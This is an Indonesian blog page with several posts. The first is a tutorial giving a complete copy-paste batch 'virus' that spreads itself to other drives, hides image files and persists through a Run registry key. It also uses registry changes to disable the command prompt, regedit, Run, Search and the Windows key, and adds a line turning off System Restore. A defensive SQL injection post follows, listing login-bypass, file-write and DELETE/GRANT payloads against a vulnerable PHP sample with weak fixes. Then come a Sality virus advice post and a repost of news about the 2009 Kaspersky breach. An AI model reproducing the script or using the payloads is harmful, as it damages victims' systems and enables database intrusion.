Membuat Virus dengan Notepad

Pada beberapa website dan blog dijelaskan tentang pembuatan antivirus menggunakan notepad. Tetapi pada tutorial tersebut menggunakan ekstensi *.vbs yang artinya menggunakan bahasa Basic. Sekarang saya akan menjelaskan membuat virus menggunakan notepad dan menggunakan bahasa DOS dan nantinya virus ini akan menggunakan ekstensi *.bat atau kita akan membuat batch file yang intinya merusak suatu sistem. Dalam pembuatan virus ini anda tidak perlu dituntut mengerti tentang pemrograman, hanya saja anda pernah mengerti/belajar tentang DOS.

Nah sekarang silahkan buka notepad, lalu ketikkan script di bawah ini atau apabila anda malas untuk mengetikkannya maka silahkan lakukan copy-paste.

echo off
for %%p in (C D E F G H I J) do copy %0 %%p:
for %%d in (*.jpg) do attrib +h +s %%d:\*.jpg /s

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v aktifkan /t REG_SZ /d C:\u-hurt-me.bat /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout /v ScancodeMap /t REG_BINARY /d 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00 /f

exit

Setelah anda selesai mengetik script di atas, lalu simpan dengan nama terserah anda dan jangan lupa memberikan embel-embel .bat.

Sedikit penjelasan mengenai virus ini..
Menggandakan dirinya ke dalam beberapa drive.
Menyembunyikan file-file image yang berekstensi jpg.
Fasilitas Run, Command Prompt, Folder Options, Search, dan Start Menu Programs dihilangkan.
Menutup akses ke regedit, command prompt, drive C sebagai system.
Men-disable tombol windows pada keyboard.

Apabila ingin lebih mengerikan lagi tambahkan script berikut ini untuk menutup System Restore.
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f

INGAT!!! Apapun yang terjadi pada anda, DI LUAR TANGGUNG JAWAB SAYA. Saya berharap anda bisa lebih bijak dalam menentukan langkah yang akan anda tempuh. Terima kasih..

SQL Injection..

Apabila anda adalah seorang administrator sebuah website atau seorang programmer web anda harus jeli dengan berbagai teknik penyerangan seorang Hacker atau Cracker. Ingat seorang programmer yang baik adalah programmer yang dapat meminimalisir kesalahan yang dibuat user baik itu yang disengaja atau tidak. dalam kasus ini saya akan menjelaskan sedikit bagaimana seseorang menyerang dengan teknik SQL Injection, saya memang pemula dan saya hanya mencoba mngingatkan kepada anda yang sudah <i>jago</i> dalam hal ini.

SQL Injection adalah teknik serangan yang menyisipkan query ke dalam suatu sistem, sehingga orang lain (penyerang) dapat mengakses database anda. Tetapi ingat bukan sembarang query yang dimasukkan. Contohnya anda memiliki kode berikut untuk login :

$match=false;
if(isset($POST[‘submit’])){
$nama=$_POST[‘nama’];
$pass=$_POST[‘password’];
$sql=”SELECT nama, password FROM user WHERE nama=’$nama’ AND password=’$pass'”;
$res=mysql_query($sql);
if($res && mysql_num_rows($res)==1){
$match=true;
mysql_free_result($res);
}
if($match==true){
echo “Account Match”;
}else{
echo “Invalid Account”;
}
}

Kode program tersebut memang melakukan verifikasi data, tetapi sangat rapuh. Penyerang bisa mengunakan query-query berikut untuk mendapatkan akses secara tidak sah.

admin’#
‘OR 1=1 INTO DUMPFILE ‘/path/ke_lokasi/file.txt’#
‘OR 1=1 INTO OUTFILE ‘/path/ke_lokasi/file.txt’#

Contoh SQL Injection di atas adalah contoh yang umum. Dan untuk mencegahnya, gunakan fungsi mysql_real_escape_string() atau addslashes(), seperti pada fungsi myMagic()

$nama=myMagic($_POST[‘nama’]);
$pass=myMagic($_POST[‘password’]);

Contoh lainnya dari SQL Injection adalah dengan menggunakan multiple query, seperti berikut:

$sql=”SELECT * FROM buku WHERE kode={$id}”; //$id dari method GET/POST
0; DELETE FROM user //menghapus isi tabel
0; GRANT ALL ON *.* to ‘xxx@%’

Ini sangat berbahaya apabila anda menggunakan server database seperti PostgreSQL atau SQLite. Untuk solusinya harus melakukan casting untuk memastikan id bertipe integer.

//simulasi nilai $_POST[‘id’]
$id=(int) myMagic($_POST[‘id’]);

Lalu untuk memeriksa apakah input mengabdung karakter tertentu, gunakan fungsi strpos()

$nama=myMagic($id);
if(strpos($nama, ‘;’)) die(‘Naughty..Naughty..Naughty’); //periksa apakah karakter ; terdapat pada $nama

Nah sekian solusi yang dapat saya berikan, dan pesan saya tetap berhati-hati karena website Kaspersky jebol karena teknik serangan ini. Terima kasih..

Sality Masih Meresahkan

Sality adalah virus lama yang daya serangnya cukup merepotkan. Dimana virus sality ini menginfeksi file-file berekstensi *.exe yang ada pada harddisk anda. Saya punya pengalaman buruk dengan virus yang satu ini, di mana semua file-file master yang saya miliki ludes di babad. Dan menurut data dari Kaspersky virus Sality.aa adalah pemimpin klasemen virus dari klasemen yang dibuat oleh Kaspersky.

Sebenarnya yang menghapus file-file executable tersebut bukan virusnya, tetapi antivirusnya sendiri. Lho ko’bisa? Memang bisa, kan saya sudah bilang kalau virus ini menginfeksi file-file executable jadi pada saat antivirus melakukan scanning maka file-file executable yang sudah terinfeksi tadi terdefinisi oleh antivirus menjadi sebuah virus. Dan ketika anda melakukan heal atau delete, maka ucapkan bubye pada file-file anda.

Lalu bagaimana solusinya?

Solusinya kalau sudah terlanjur terinfeksi adalah lakukan pembersihan dengan antivirus dan relakan file-file executable anda lenyap.

Lebih baik mencegah daripada mengobati. Itulah intinya.

Baca artikel saya yang judulnya “Aman tanpa Antivirus”, lalu terapkan apa yang saya tuliskan pada komputer anda. Kalau anda tidak bisa melakukannya tanpa antivirus, maka pakailah antivirus. dan jangan lupa arsipkan semua file-file executable (master/installer) yang anda miliki dengan WinZip atau WinRAR. Karena virus ini tidak bisa menginfeksi file-file dalam kompresi RAR atau Zip.

Nah sekian solusi terbaik dari saya. Terima kasih..

Situs Kaspersky ‘Dijebol’ Hacker, Apa Kata Dunia?

MOSKOW – Produsen software antivirus asal Rusia Kaspersky memang telah banyak membantu jutaan pengguna komputer untuk urusan keamanan. Tapi saat ini, justru Kaspersky yang harus berjuang melawan serangan hacker yang menjebol situs Kaspersky.

Tentu saja hal itu membuat sebagian kalangan tak percaya dan bertanya-tanya, karena Kaspersky merupakan penyedia solusi keamanan terbesar di dunia, mengapa situsnya sendiri bisa dibobol?

Seperti dilansir, SMH, Selasa (10/2/2009) dalam sebuah postingan di hackersblog.org seorang hacker menampilkan hasil screenshot situs Kaspersky yang telah disusupinya. Hacker tersebut mengungkapkan, dirinya hanya menggunakan teknik SQL Injection untuk mengakses semua database Kaspersky, seperti aktivasi kode dan daftar bug.

Hacker tersebut mengatakan, ia juga telah mendapatkan rincian data para pelanggan, namun ia tak akan mempublikasikan data tersebut secara online.

Namun, Kaspersky menyatakan tak ada satu pun data yang tercuri, dan penyerangan itu tak terlalu merepotkan. Sesaat setelah penyerangan di usa.kaspersky.com, Kaspersky langsung dapat memperbaiki situs itu.

Pembobolan tersebut bukanlah hal yang pertama bagi Kaspersky. Pada bulan Juli lalu, situs Kaspersky Malaysia juga dijebol oleh hacker asal Turki dengan menggunakan teknik yang sama, SQL injection.

Dikutip dari www.okezone.com